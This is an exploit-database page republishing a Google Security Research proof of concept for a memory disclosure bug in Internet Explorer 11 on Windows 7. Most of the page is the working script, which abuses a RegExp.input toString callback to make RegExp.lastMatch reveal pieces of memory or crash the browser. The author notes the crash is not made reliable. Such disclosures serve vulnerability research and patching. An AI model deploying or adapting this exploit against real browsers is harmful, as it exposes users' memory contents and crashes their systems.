Lucene search

K
zdtGoogle Security Research1337DAY-ID-30030
HistoryMar 20, 2018 - 12:00 a.m.

Internet Explorer - RegExp.lastMatch Memory Disclosure Exploit

2018-03-2000:00:00
Google Security Research
0day.today
32

EPSS

0.946

Percentile

99.3%

Exploit for windows platform in category dos / poc

/*
There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.
 
This was tested on IE11 running on Window 7 64-bit with the latest patches applied.
 
PoC:
 
=========================================
*/
 
<!-- saved from url=(0014)about:internet -->
<script>
 
function main() {
  RegExp.input = {toString: f};
  alert(RegExp.lastMatch);
}
 
var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");
 
function f() {
  String.prototype.match.call(input, "bbbbbbbbbb");
}
 
main();
 
</script>
 
/*
=========================================
 
Note that sometimes the PoC results in a crash (I made no attempt to make it reliable) while sometimes it results in pieces of memory being displayed
*/

#  0day.today [2018-04-06]  #